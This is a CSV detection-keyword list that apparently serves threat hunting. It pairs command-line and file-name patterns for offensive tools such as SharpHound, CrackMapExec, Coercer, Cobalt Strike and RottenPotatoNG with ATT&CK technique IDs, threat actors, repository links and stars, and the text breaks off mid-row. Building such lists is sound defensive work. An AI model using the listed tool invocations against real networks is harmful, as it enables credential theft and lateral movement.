"* cmedb",".{0,1000}\scmedb","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","617"
"* CMLoot.ps1*",".{0,1000}\sCMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","618"
"* CMSFRottenPotato::*",".{0,1000}\sCMSFRottenPotato\:\:.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#content","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","619"
"* cmstp_uac.ahk*",".{0,1000}\scmstp_uac\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","620"
"* coap-resources.nse*",".{0,1000}\scoap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","622"
"* -cobalt *",".{0,1000}\s\-cobalt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","623"
"* cobaltstrike*",".{0,1000}\scobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","624"
"* Code by lion & bkbll, Welcome to http://www.cnhonker.com *",".{0,1000}\sCode\sby\slion\s\&\sbkbll,\sWelcome\sto\shttp\:\/\/www\.cnhonker\.com\s.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","625"
"* coerce * --dc-ip *",".{0,1000}\scoerce\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","626"
"* coerce -u * -p * --listener-ip*",".{0,1000}\scoerce\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\-ip.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","627"
"* CoercedPotato.cpp*",".{0,1000}\sCoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","628"
"* Coercer.py*",".{0,1000}\sCoercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","629"
"* --coff-arg *",".{0,1000}\s\-\-coff\-arg\s.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","630"
"* CoffeeExecuteFunction*",".{0,1000}\sCoffeeExecuteFunction.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","631"
"* COFFLoader.exe*",".{0,1000}\sCOFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","632"
"* collect activedirectory --*",".{0,1000}\scollect\sactivedirectory\s\-\-.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","635"
"* --collectallproperties*",".{0,1000}\s\-\-collectallproperties.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","636"
"* --CollectionMethod All *ldap*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}ldap.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","637"
"* --CollectionMethod All *--ZipFileName *.zip*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}\-\-ZipFileName\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","638"
"* -CollectionMethod All*loggedon*",".{0,1000}\s\-CollectionMethod\sAll.{0,1000}loggedon.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","639"
"* -CollectionMethod LoggedOn -Verbose*",".{0,1000}\s\-CollectionMethod\sLoggedOn\s\-Verbose.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","640"
"* -CollectionMethod stealth*",".{0,1000}\s\-CollectionMethod\sstealth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","641"
"* --collectionmethods ACL*",".{0,1000}\s\-\-collectionmethods\sACL.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","642"
"* --collectionmethods ComputerOnly*",".{0,1000}\s\-\-collectionmethods\sComputerOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","643"
"* --collectionmethods Container*",".{0,1000}\s\-\-collectionmethods\sContainer.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","644"
"* --collectionmethods DCOM",".{0,1000}\s\-\-collectionmethods\sDCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","645"
"* --collectionmethods DCOnly*",".{0,1000}\s\-\-collectionmethods\sDCOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","646"
"* --collectionmethods GPOLocalGroup*",".{0,1000}\s\-\-collectionmethods\sGPOLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","647"
"* --collectionmethods Group*",".{0,1000}\s\-\-collectionmethods\sGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","648"
"* --collectionmethods LocalGroup*",".{0,1000}\s\-\-collectionmethods\sLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","649"
"* --collectionmethods LoggedOn*",".{0,1000}\s\-\-collectionmethods\sLoggedOn.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","650"
"* --collectionmethods ObjectProps*",".{0,1000}\s\-\-collectionmethods\sObjectProps.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","651"
"* --collectionmethods PSRemote*",".{0,1000}\s\-\-collectionmethods\sPSRemote.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","652"
"* --collectionmethods RDP*",".{0,1000}\s\-\-collectionmethods\sRDP.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","653"
"* --collectionmethods Session*",".{0,1000}\s\-\-collectionmethods\sSession.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","654"
"* --collectionmethods Trusts*",".{0,1000}\s\-\-collectionmethods\sTrusts.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","655"
"* --CollectLinks --apitoken * --outfile *",".{0,1000}\s\-\-CollectLinks\s\-\-apitoken\s.{0,1000}\s\-\-outfile\s.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","656"
"* --com xslremote --awlurl *",".{0,1000}\s\-\-com\sxslremote\s\-\-awlurl\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","657"
"* com.blackh4t*",".{0,1000}\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 